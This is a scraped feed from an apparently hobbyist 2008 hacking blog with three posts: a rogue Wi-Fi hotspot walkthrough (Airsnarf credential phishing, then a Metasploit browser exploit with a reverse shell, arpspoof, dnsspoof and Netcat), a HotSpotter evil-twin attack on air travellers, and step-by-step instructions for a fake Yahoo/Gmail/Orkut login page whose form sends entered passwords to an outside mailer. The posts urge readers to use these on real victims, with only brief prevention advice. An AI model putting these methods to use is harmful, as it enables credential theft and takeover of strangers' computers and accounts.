&lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;airsnarf.cgi file&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; With Airnsnarf configured with default settings, it will display a default login page that looks like the following:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/3.jpg" alt="Active Image" height="305" width="575" /&gt;&lt;br /&gt;This page takes username &amp;amp; password which is entered &amp;amp; place it in a file wer it can be read.&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;For making dis attack work, we have modify this login page so dat it looks same as WI_Fi hotspot provider's login.Basic html skills are required, it is not so difficult to goto a T-Mobile, Wayport, STSN, Concourse or any other hotspot provider's site u have to copy &amp;amp; paste their graphics to make ur fake login page look real.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;After configuring Airsnarf &amp;amp; creating fake login page, we can launch the attack.Any public place  like airport,coffee shop's, parks  wer people uses their laptops it ll work.For launching dis attack we have to  activate Airsnarf by typing ./airsnarf command. Below u can c wat is going to happen after launching ur attack.&lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/4.jpg" alt="Active Image" height="594" width="575" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;strong&gt;Airsnarf being launched and waiting for a connection&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;Here we see an end-user attempts to connect to the hotspot ll c the SSID which was entered in&lt;br /&gt;airsnarf.cfg file &amp;amp; use der pc to connect to the network.After launching der browser, they r asked to enter their username &amp;amp; password.&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/5.jpg" alt="Active Image" height="434" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;strong&gt;Windows Zero Config showing the T-Mobile HotSpot being broadcast by Airsnarf&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/6.jpg" alt="Active Image" height="256" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;strong&gt;Fake Walled Garden/Login Page presented by Airsnarf&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;If the user enter his  username &amp;amp; password &amp;amp; clicks on login button, his username &amp;amp; password has been sent to hackers &amp;amp; he can utilises it.Many of us keep same username &amp;amp; passwords for all  accounts so dat we can remember,Now if da hackers gets ur  username &amp;amp; password can access ur email's ur online banking &amp;amp; so on.....&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/7.jpg" alt="Active Image" height="113" width="532" /&gt;&lt;br /&gt;&lt;strong&gt;Example of credentials entered into Airsnarf AP Phishing Site and dumped to a file&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;U can also make variations for the aboce trick to change SSID's to "Free Public Wi-Fi",&amp;amp; at this point u can change login page as below.&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/8.jpg" alt="Active Image" height="392" width="575" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; Many users ll fall for dis trick &amp;amp; u can access der accounts..&lt;br /&gt;&lt;br /&gt;Malicious Websites &amp;amp; Browser Exploits:&lt;br /&gt;Given the knowledge of the aforementioned exploits, a creative combination could be had.  What if the walled garden/login page in the previous exploit actually contained code that would exploit a user's machine?  That way an attacker could gain access to an end-user system just by that user attempting to connect to what they believe is a valid Wi-Fi hotspot.  An exploit that could take advantage of this is Microsoft's relatively recent Create Text Range vulnerability.  All a hacker would need to do is copy the malicious code into the login page and every person who connected to that hotspot could potentially be exploited.  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/9.jpg" alt="Active Image" height="362" width="575" /&gt;  &lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; Part of the actual code that could be inserted into a webpage to automatically download and run a malicious executable on the victim's machine just by that user viewing the webpage. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; That would be "cool," but we're going to take it a step further.  What if people who were currently connected to the hotspot were "forced" to view a malicious page, regardless of the URL they entered into their browser?  That would be "cooler!" &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; This hack contains the following steps:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Creating a malicious webpage and serving-it-up on a laptop&lt;/li&gt;&lt;li&gt;Redirecting traffic at a Public Wi-Fi Hotspot to that malicious webpage running on the laptop&lt;/li&gt;&lt;li&gt;As the victim is redirected and the malicious page is viewed, a browser-based exploit is run which gives the hacker a live command shell (c:\) on the victim's machine&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p style="text-align: justify;"&gt; So, the hacker goes to a Public Wi-Fi hotspot and connects to the network.  He then launches Metasploit to create the malicious webpage and serve-it-up. &lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/10.jpg" alt="Active Image" height="357" width="576" /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;Commands to use  Microsoft's Create Text Range vulnerability and to select the option of creating a reverse shell back to the hacker once the exploit is executed&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/11.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;The setting of various options for the exploit&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/12.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;With all options set properly, the web page is served-up and ready to exploit the machine by running the "exploit" command&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Now that there's a machine on the hotspot network running a malicious webpage, it's necessary to redirect traffic destined for the Internet to that website. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/13.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Run the arpspoof command to redirect traffic destined for the Internet to the malicious webpage.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/14.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Running dnsspoof, you can see that a user attempted to go to foxnews.com but was redirected to the malicious webpage.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/15.jpg" alt="Active Image" height="142" width="575" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; This is the page that contains the malicious content that will enable a hacker to connect to the victim machine via Netcat.  This page appears regardless of the URL entered by the end-user.  This page could look like and say anything. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/16.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The hacker then launches Netcat.  The C:\ is on the victim's machine which is real bad news for the victim.  FYI - Windows XP Firewall and Symantec AV were running the entire time. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; If you didn't want to go to a public Wi-Fi hotspot and serve-up the webpage, you could just host the website somewhere and send out e-mails trying to convince people to go to the site.  With Metasploit, for example, the payload doesn't have to be a reverse shell, you can have the malicious webpage download and execute a malicious file.  Perhaps that malicious file would install a Trojan, Keylogger, or other Malware. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/17.jpg" alt="Active Image" height="357" width="576" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Examples of possible Metasploit Payloads for ie_createtextrange exploit.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;Now that we've seen the "cool" and illegal hacks, let's talk about the real purpose of this article - Prevention!  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;h1 style="font-weight: normal; text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;Preventing the Hacks:There are basically two things to combating the previous hacks:&lt;/span&gt;  &lt;/h1&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Taking measures to ensure a hotspot is valid&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Protecting the machine against browser-based exploits&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong style="font-weight: normal;"&gt;Ensuring a Hotspot is Valid:&lt;/strong&gt;&lt;br /&gt;Validating a hotspot is extremely difficult for an end-user to do.  In fact, the only realistic method to do so is to use a wireless client designed to work with various hotspots that can use some sort of WISPr check to help ensure the Hotspot is what it says it is.  I used T-Mobile in the above example in large part because they are one of the few providers that can utilize this type of functionality.  In fact, the best solution I know for enterprises to protect against public hotspot AP Phishing for their mobile users is to use a client such as Fiberlink's e360.  Using a client such as this provides two areas of protection: &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ol style="text-align: justify;"&gt;&lt;li&gt;The hotspot signal itself can be validated&lt;/li&gt;&lt;li&gt;The end-user doesn't enter their credentials into a webpage which can be faked. They select a signal with the client and enter the credentials in that client.&lt;/li&gt;&lt;/ol&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Note that in the below graphic, a valid T-Mobile HotSpot is displayed as "Fiberlink Wireless Premium Powered by T-Mobile" as opposed to just "tmobile."  That is because the client has determined that the particular hotspot in question is, in fact, a valid T-Mobile HotSpot.  If it were not valid a valid hotspot, the SSID would simply be displayed as it is being broadcast. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/18.jpg" alt="Active Image" height="458" width="397" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Client-based solution that helps mitigate risk by helping to validate a hotspot.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; As mentioned in the second point, the user enters their credentials into the client not into a web-based form.  For many obvious reasons, this is significantly more secure.  With this particular client, both the username and password are immediately encrypted with 256-bit AES. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/19.jpg" alt="Active Image" height="278" width="241" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The entering of credentials into a client as opposed to an easily spoofed webpage.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;Protecting the Machine Against Browser-based Exploits:&lt;/strong&gt;&lt;br /&gt;As with many exploits, the key is to have the mobile device be protected at all times.  To protect against these exploits, the mobile device needs to: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;&lt;strong style="font-weight: bold;"&gt;&lt;em&gt;Have the latest security patches installed.&lt;/em&gt;&lt;/strong&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/span&gt;This is increasingly difficult to do for corporations as laptops are spending less and less of their time connected to the corporate LAN. This is bad, since many corporations can only push patches to machines when they are on the LAN. Consequently, corporations need to employ solutions that can push patches down to mobile devices anytime they are connected to the Internet and without end-user interaction.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;&lt;em&gt;Be restricted from surfing the Internet or connecting wirelessly if they do not have the latest patches&lt;/em&gt;&lt;/strong&gt;. This makes sense. If you are not secure enough to surf the Internet or connect to wireless hotspots, because you do not have a necessary patch, you shouldn't be able to do so. In essence, you need to protect yourself from yourself. For corporations, they are beginning to look at functionality such as Cisco NAC to help with this. Unfortunately, Cisco NAC only quarantines on the LAN or Post-VPN. It won't analyze the security posture of the mobile device or quarantine it if it doesn't have the necessary patches until it is essentially too late. That's why corporations need to implement solutions that will quarantine and remediate devices while the device is mobile, not just when they are VPNing into the corporate network. The logic for assessing the security posture and for quarantining needs to be on the endpoint itself!&lt;/li&gt;&lt;li&gt;Employ a program to protect against Zero Day type of attacks such as a Personal Firewall with IPS capabilities. As an example, even if the above machine weren't patched, ISS' Proventia would protect a machine against the aforementioned browser exploit.&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h1 style="font-weight: normal; text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;conclusion:                                                                                                                                                                                                                                                                                                                                      I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment.  I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.&lt;/span&gt; &lt;/h1&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Conclusion:&lt;/span&gt;&lt;br /&gt;I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment.  I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Special thanks to the Metasploit Project and Schmoo Group.  The use of your tools in explaining how the exploits are performed and the work you have put into the development of these tools is invaluable and appreciated. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;The credit goes to the Ethical Hackers.&lt;/p&gt;&lt;span style="font-weight: bold;"&gt;Related Articles:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/hacking-online-banking-and-credit-card.html"&gt;Hacking online banking &amp;amp; credit cards&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html"&gt;Wireless Network Sniffer&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/essential-wireless-hacking-tools.html"&gt;Wireless Hacking Tools&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;   &lt;/p&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/wireless-hotspot-hacks.html</link><author>noreply@blogger.com (saien)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-4294929218527858767</guid><pubDate>Tue, 19 Feb 2008 09:21:00 +0000</pubDate><atom:updated>2008-02-21T21:36:45.577-08:00</atom:updated><title>Wireless Hacking</title><description>&lt;p style="text-align: justify;"&gt;Wireless Hacking at an height of 30,000 feet where there is no wireless network!&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;font style="font-weight: bold;"&gt;Outline:&lt;/font&gt;&lt;br /&gt;           As we all know travelers use their laptops in planes.This is a safe place as many flights don't provide with wireless/satellite access to internet for the passengers.Consequently,the biggest threat of security, is someone reading ur data.Wireless hacker can explore their systems without der knowledge.&lt;br /&gt;We all know dat for configuring connection to a wireless network in &lt;font style="font-weight: bold;"&gt;win&lt;/font&gt; &lt;font style="font-weight: bold;"&gt;XP Zero Config&lt;/font&gt;, U have to goto the network connections &amp;amp; adding a network 2 da preferred network, U can connect 2 a wireless signal which have have been displayed on wireless networks &amp;amp; upon connection,it ll automatically add dat network on a network list.Win Xp automatically connects 2 dat network every time wen it is sensed &amp;amp; da applicable config info is maintained in dat network &lt;font style="font-weight: bold;"&gt;"bookmark"&lt;/font&gt;. Laptop user is unknown wat occurs from dat point forward.Wat happens is Win Zero Config ll routinely, automatically sends probe requests into air, searches for an available network, if it find  it gets connected to it, if it is not connected it sends again request for the network.&lt;font style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;font style="font-weight: bold;"&gt;Hack:&lt;/font&gt;&lt;br /&gt;Suppose ur in plane &amp;amp; a probe requests have been sent to u , searching for da network(S), u have defined in ur network section.One more person in plane is using laptop &amp;amp; running a program named as &lt;font style="font-weight: bold;"&gt;HotSpotter&lt;/font&gt;.Dis program ll c those probe requests &amp;amp; compare these with a list of known &lt;font style="font-weight: bold;"&gt;SSIDs&lt;/font&gt;, den it turns itself into wireless access point with an matching &lt;font style="font-weight: bold;"&gt;SSID&lt;/font&gt; of network in ur network list.Now u have been connected to the hackers "wireless network".If the user is not using firewall the hacker can easily hack his computer &amp;amp; his transactions &amp;amp; we think we r safe..&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;Check out &lt;a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html"&gt;here&lt;/a&gt; for another tool used in wireless hacking.&lt;br /&gt;&lt;br /&gt;&lt;font style="font-weight: bold;"&gt;Tools:&lt;/font&gt;&lt;br /&gt;&lt;font style="font-weight: bold;"&gt;&lt;/font&gt;&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Laptop  with an wireless card  which supports &lt;a target="_blank" href="http://en.wikipedia.org/wiki/HostAp" class="undefined"&gt;HostAP&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;font style="font-weight: bold;"&gt;HotSpotter&lt;/font&gt; (we learned abt it  above) program which contains scripts 2 run DHCP (U can   dis program in Auditor security collections:&lt;a target="_blank" href="http://www.remote-exploit.org/index.php/Auditor_main" class="undefined"&gt; http://www.remote-exploit.org/index.php/Auditor_main&lt;/a&gt;  or&lt;a target="_blank" href="http://www.remote-exploit.org/index.php/Auditor_main" class="undefined"&gt; http://www.remote-exploit.org&lt;/a&gt;  )&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Choice of programs on exploiting the victims pc, once de connected to ur WLAN.Check for the diff tools of same category in Auditor security collection...&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;font style="font-weight: bold;"&gt;Prevention:&lt;/font&gt;&lt;br /&gt;&lt;font size="12"&gt;&lt;strong&gt;&lt;font style="font-weight: normal;"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;br /&gt;&lt;font size="12"&gt;&lt;strong&gt;&lt;font style="font-weight: normal;"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;&lt;ul style="text-align: justify; font-weight: bold;"&gt;&lt;li&gt;&lt;font size="3"&gt;&lt;strong&gt;&lt;font style="font-weight: normal;"&gt;Keep an up 2 date &amp;amp; running firewall with an IDS/IPS capability,this protects ur pc from detecting ur network by  from the probe requests.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Run a configured Anti-Virus &amp;amp; Anti-spyware u can protect urself from hacking, if ur not using any anti-virus &amp;amp; anti-spyware they break into ur system &amp;amp; install malware,&lt;a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html"&gt;keyloggers&lt;/a&gt;,system monitors, &lt;a href="http://freedownloaz.blogspot.com/2008/01/remote-hacking_6357.html"&gt;remote hacking&lt;/a&gt;) &amp;amp; if u protections they ll detect these malware, &lt;a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html"&gt;keylogger&lt;/a&gt;, &lt;a href="http://freedownloaz.blogspot.com/2008/01/remote-hacking_6357.html"&gt;remote hacking&lt;/a&gt; &amp;amp; so on...&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Use security enforcement software- Components such as &lt;a target="_blank" href="http://www.networkassociates.com/us/products/mcafee/mgmt_solutions/epo.htm" class="undefined"&gt;McAfee's EPO&lt;/a&gt;  &amp;amp; see dat  all da security    services which are running in ur pc from start up to shutdown always updated.&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;IF ur using Wi-Fi adapter disable it-enable wen u attemt to make a conection&lt;/li&gt;&lt;/ul&gt;&lt;font style="font-weight: bold;"&gt;Related Articles:&lt;br /&gt;&lt;/font&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/hacking-online-banking-and-credit-card.html"&gt;Hacking online banking &amp;amp; credit cards&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html"&gt;Wireless Network Sniffer&lt;/a&gt;&lt;font style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/font&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/essential-wireless-hacking-tools.html"&gt;Wireless Hacking Tools&lt;/a&gt;&lt;br /&gt;&lt;font style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/font&gt;&lt;div style="text-align: justify;"&gt;    &lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/wireless-hacking_19.html</link><author>noreply@blogger.com (saien)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-5957781726044892234</guid><pubDate>Sun, 17 Feb 2008 09:07:00 +0000</pubDate><atom:updated>2008-02-21T21:29:39.786-08:00</atom:updated><title>How to make a fake page for yahoo,orkut,gmail..</title><description>&lt;h3 style="font-weight: normal;" class="smller"&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;How to make a fake page for yahoo,orkut,gmail &amp;amp; for any website...!&lt;/span&gt;&lt;span style="font-size:100%;"&gt;By using fake pages u can hack passwords &amp;amp; now everyone knows it but there are some guys who don't know abt fake pages...Here i m not talking abt retrieving passwords but how to make a fake page...Have a look on it..♥&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt; &lt;div class="para"&gt;&lt;br /&gt;1.First of all open the  page for which u wanna a make fake.&lt;br /&gt;&lt;br /&gt;2. Save dat page, Goto to file &amp;amp; save the complete web page.&lt;br /&gt;&lt;br /&gt;3. Now u have saved the exact page of that site &amp;amp; start the work.&lt;br /&gt;&lt;br /&gt;4. Right Click on dat Page and click on  edit.&lt;br /&gt;&lt;br /&gt;5. Search for the word &lt;span style="font-weight: bold;"&gt;Form&lt;/span&gt; in code of dat page.&lt;br /&gt;&lt;br /&gt;6.  Delete dat &lt;span style="font-weight: bold;"&gt;Form Value , Method ,Action&lt;/span&gt;, delete everything watever written on it.&lt;br /&gt;&lt;br /&gt;7. ADD this code&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;form action=”&lt;/span&gt;&lt;a style="font-weight: bold;" href="http://www.big-llc.com/formmailer/submit" target="_blank"&gt;http://www.big-llc.com/formmail&lt;wbr&gt;er/submit&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;” method=”post”&amp;gt;&amp;lt;input type=”hidden” value=”&lt;span style="color: rgb(255, 0, 0);"&gt;Your Email Id&lt;/span&gt;” name=”fm-to”&amp;gt;&amp;lt;font color=”#333333″&amp;gt; &amp;lt;/font&amp;gt;&amp;lt;input type=”hidden” value=”password D3″ name=”fm-title”&amp;gt;&amp;lt;font color=”#333333″&amp;gt; &amp;lt;/font&amp;gt;&amp;lt;input type=”hidden” value=”Link You Want To redirect” name=”fm-redirect”&amp;gt;&amp;lt;font color=”#333333″&amp;gt; &amp;lt;/font&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;8. Instead of &lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Your Email Id &lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;write ur email address.&lt;br /&gt;&lt;br /&gt;9. Save &amp;amp; close.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;10. Upload ur fake page on any free hosting services.&lt;br /&gt;&lt;br /&gt;Ur done with it u have made ur own fake page...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related Articles:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2007/12/easiest-way-to-hack-gmail-or-orkut-with.html"&gt;Hack Orkut with Fake Page&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/fake-yahoo-messenger.html"&gt;Fake yahoo Messenger&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/fake-gtalk.html"&gt;Fake GTalk&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;img 